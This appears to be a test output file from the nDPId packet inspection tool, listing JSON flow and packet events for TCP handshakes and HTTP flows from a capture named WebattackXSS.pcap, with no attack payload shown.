-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347599663,"flow_last_seen":1499347604783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58920,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6289,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347721376,"flow_last_seen":1499347721376,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347721376,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60234,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6289,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":445,"flow_packet_id":1,"flow_last_seen":1499347721376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347721376,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UaNAAD4GdC2sEAABwKgKMutKAFCqmpZXAAAAAKACchBpRwAAAgQFtAQCCAoBO8f0AAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6290,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":445,"flow_packet_id":2,"flow_last_seen":1499347721376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347721376,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ60r+f8PRqpqWWKAScSAKhgAAAgQFtAQCCAoD5ZlpATvH9AEDAwc="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":445,"flow_packet_id":3,"flow_last_seen":1499347721376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347721376,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UaRAAD4GdDSsEAABwKgKMutKAFCqmpZY\/n\/D0oAQAOWpjQAAAQEICgE7x\/QD5Zlp"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6311,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347724082,"flow_last_seen":1499347724082,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347724082,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60260,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6311,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":446,"flow_packet_id":1,"flow_last_seen":1499347724082,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347724082,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Pn9AAD4Gh1GsEAABwKgKMutkAFAGCvTmAAAAAKACchCsiQAAAgQFtAQCCAoBO8qZAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6312,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":446,"flow_packet_id":2,"flow_last_seen":1499347724082,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347724082,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ62S3KtySBgr056AScSB5twAAAgQFtAQCCAoD5ZwOATvKmQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6313,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":446,"flow_packet_id":3,"flow_last_seen":1499347724083,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347724083,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0PoBAAD4Gh1isEAABwKgKMutkAFAGCvTntyrck4AQAOUYvwAAAQEICgE7ypkD5ZwO"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347725355,"flow_last_seen":1499347725355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347725355,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60274,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":447,"flow_packet_id":1,"flow_last_seen":1499347725355,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347725355,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jaBAAD4GODCsEAABwKgKMutyAFBT4UZ3AAAAAKACchAL1gAAAgQFtAQCCAoBO8vXAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6321,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":447,"flow_packet_id":2,"flow_last_seen":1499347725356,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347725356,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ63J14+58U+FGeKAScSAHIwAAAgQFtAQCCAoD5Z1MATvL1wEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6322,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":447,"flow_packet_id":3,"flow_last_seen":1499347725356,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347725356,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jaFAAD4GODesEAABwKgKMutyAFBT4UZ4dePufYAQAOWmKgAAAQEICgE7y9cD5Z1M"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6333,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347726623,"flow_last_seen":1499347726623,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347726623,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60288,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6333,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":448,"flow_packet_id":1,"flow_last_seen":1499347726623,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347726623,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8cctAAD4GVAWsEAABwKgKMuuAAFD+ZrzfAAAAAKACchDpnAAAAgQFtAQCCAoBO80UAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6334,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":448,"flow_packet_id":2,"flow_last_seen":1499347726623,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347726623,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ64DDQROl\/ma84KAScSBxJgAAAgQFtAQCCAoD5Z6JATvNFAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6335,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":448,"flow_packet_id":3,"flow_last_seen":1499347726624,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347726624,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ccxAAD4GVAysEAABwKgKMuuAAFD+Zrzgw0ETpoAQAOUQLgAAAQEICgE7zRQD5Z6J"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6351,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347729211,"flow_last_seen":1499347729211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347729211,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6351,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":449,"flow_packet_id":1,"flow_last_seen":1499347729211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347729211,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NhFAAD4Gj7+sEAABwKgKMuuaAFCuIPmKAAAAAKACchD6lgAAAgQFtAQCCAoBO8+bAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6352,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":449,"flow_packet_id":2,"flow_last_seen":1499347729211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347729211,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ65plKrngriD5i6AScSA3dQAAAgQFtAQCCAoD5aEQATvPmwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":449,"flow_packet_id":3,"flow_last_seen":1499347729212,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347729212,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NhJAAD4Gj8asEAABwKgKMuuaAFCuIPmLZSq54YAQAOXWfAAAAQEICgE7z5sD5aEQ"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6363,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347730501,"flow_last_seen":1499347730501,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730501,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60328,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6363,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_packet_id":1,"flow_last_seen":1499347730501,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347730501,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83upAAD4G5uWsEAABwKgKMuuoAFBoeQ40AAAAAKACchAqRAAAAgQFtAQCCAoBO9DeAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6364,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_packet_id":2,"flow_last_seen":1499347730501,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347730501,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ66jFwizsaHkONaAScSCSPAAAAgQFtAQCCAoD5aJSATvQ3gEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6365,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_packet_id":3,"flow_last_seen":1499347730502,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347730502,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03utAAD4G5uysEAABwKgKMuuoAFBoeQ41xcIs7YAQAOUxRAAAAQEICgE70N4D5aJS"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347606078,"flow_last_seen":1499347611787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58988,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347606078,"flow_last_seen":1499347611787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347607344,"flow_last_seen":1499347612785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59002,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347607344,"flow_last_seen":1499347612785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59002,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347608596,"flow_last_seen":1499347613787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59016,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347608596,"flow_last_seen":1499347613787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59016,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347612465,"flow_last_seen":1499347617785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59056,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347612465,"flow_last_seen":1499347617785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59056,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347613718,"flow_last_seen":1499347618787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59070,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347613718,"flow_last_seen":1499347618787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59070,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"finished","flow_packets_processed":315,"flow_first_seen":1499347547687,"flow_last_seen":1499347614979,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232682,"flow_avg_l4_payload_len":738,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58360,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347731797,"flow_last_seen":1499347731797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347731797,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60342,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_packet_id":1,"flow_last_seen":1499347731797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347731797,"pkt":"ABm5CmnxAMGxFOsxCABFAAA84K9AAD4G5SCsEAABwKgKMuu2AFCGTjKNAAAAAKACchDmwwAAAgQFtAQCCAoBO9IiAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_packet_id":2,"flow_last_seen":1499347731797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347731797,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ67ZFR3+Dhk4yjqAScSB7XAAAAgQFtAQCCAoD5aOWATvSIgEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6377,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_packet_id":3,"flow_last_seen":1499347731798,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347731798,"pkt":"ABm5CmnxAMGxFOsxCABFAAA04LBAAD4G5SesEAABwKgKMuu2AFCGTjKORUd\/hIAQAOUaZAAAAQEICgE70iID5aOW"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6387,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347733083,"flow_last_seen":1499347733083,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347733083,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60356,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6387,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":452,"flow_packet_id":1,"flow_last_seen":1499347733083,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347733083,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/vJAAD4Gxt2sEAABwKgKMuvEAFCmnS2RAAAAAKACchDKIQAAAgQFtAQCCAoBO9NjAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":452,"flow_packet_id":2,"flow_last_seen":1499347733083,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347733083,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ68TrnH4qpp0tkqAScSC4ewAAAgQFtAQCCAoD5aTYATvTYwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6389,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":452,"flow_packet_id":3,"flow_last_seen":1499347733084,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347733084,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/vNAAD4GxuSsEAABwKgKMuvEAFCmnS2S65x+K4AQAOVXgwAAAQEICgE702MD5aTY"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6396,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347734348,"flow_last_seen":1499347734348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347734348,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60370,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6396,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":453,"flow_packet_id":1,"flow_last_seen":1499347734348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347734348,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gzpAAD4GQpasEAABwKgKMuvSAFDIKlelAAAAAKACchB9NgAAAgQFtAQCCAoBO9SfAAAAAAEDAwc="} 